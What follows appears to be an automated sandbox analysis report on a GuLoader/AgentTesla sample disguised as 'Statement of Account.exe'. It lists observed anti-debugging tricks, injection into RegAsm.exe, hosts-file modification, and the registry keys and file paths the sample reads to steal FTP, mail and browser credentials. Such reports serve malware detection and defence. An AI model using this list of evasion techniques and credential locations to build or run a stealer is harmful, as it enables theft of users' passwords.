Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread information set: HideFromDebugger			Jump to behavior

Enables debug privileges

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Process token adjusted: Debug

Jump to behavior

Contains functionality to read the PEB

Source: C:\Users\user\Desktop\Statement of Account.exe	Code function: 1_2_00403248 mov ebx, dword ptr fs:[00000030h]		1_2_00403248
Source: C:\Users\user\Desktop\Statement of Account.exe	Code function: 1_2_0040225E mov ebx, dword ptr fs:[00000030h]		1_2_0040225E
Source: C:\Users\user\Desktop\Statement of Account.exe	Code function: 1_2_004031BE mov ebx, dword ptr fs:[00000030h]		1_2_004031BE

Checks if the current process is being debugged

Source: C:\Users\user\Desktop\Statement of Account.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process queried: DebugPort			Jump to behavior

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 9_2_012876A6 KiUserExceptionDispatcher,LdrInitializeThunk,

9_2_012876A6

Creates guard pages, often used to prevent reverse engineering and debugging

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

Writes to foreign memory regions

Source: C:\Users\user\Desktop\Statement of Account.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 1360000

Jump to behavior

Modifies the hosts file

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

File written: C:\Windows\System32\drivers\etc\hosts

Jump to behavior

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\Desktop\Statement of Account.exe

Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe 'C:\Users\user\Desktop\Statement of Account.exe'

Jump to behavior

May try to detect the Windows Explorer process (often used for injection)

Source: RegAsm.exe, 00000009.00000002.52057791523.0000000001B60000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: RegAsm.exe, 00000009.00000002.52057791523.0000000001B60000.00000002.00020000.sdmp	Binary or memory string: Progman
Source: RegAsm.exe, 00000009.00000002.52057791523.0000000001B60000.00000002.00020000.sdmp	Binary or memory string: :Program Managerev
Source: RegAsm.exe, 00000009.00000002.52057791523.0000000001B60000.00000002.00020000.sdmp	Binary or memory string: Progmanlock

Language, Device and Operating System Detection:

Queries the volume information (name, serial number etc) of a device

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe VolumeInformation			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Roaming\DnDcR\DnDcR.exe	Queries volume information: C:\Users\user\AppData\Roaming\DnDcR\DnDcR.exe VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Roaming\DnDcR\DnDcR.exe	Queries volume information: C:\Users\user\AppData\Roaming\DnDcR\DnDcR.exe VolumeInformation			Jump to behavior

Queries the cryptographic machine GUID

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings:

Modifies the hosts file

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

File written: C:\Windows\System32\drivers\etc\hosts

Jump to behavior

Stealing of Sensitive Information:

Yara detected AgentTesla

Source: Yara match	File source: 00000009.00000002.52066446246.000000001E3C1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 3428, type: MEMORYSTR

GuLoader behavior detected

Source: Initial file

Signature Results: GuLoader behavior

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions

Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\			Jump to behavior

Tries to steal Mail credentials (via file access)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities			Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data			Jump to behavior

Yara detected Credential Stealer

Source: Yara match	File source: 00000009.00000002.52066446246.000000001E3C1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 3428, type: MEMORYSTR

Remote Access Functionality:

Yara detected AgentTesla

Source: Yara match	File source: 00000009.00000002.52066446246.000000001E3C1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 3428, type: MEMORYSTR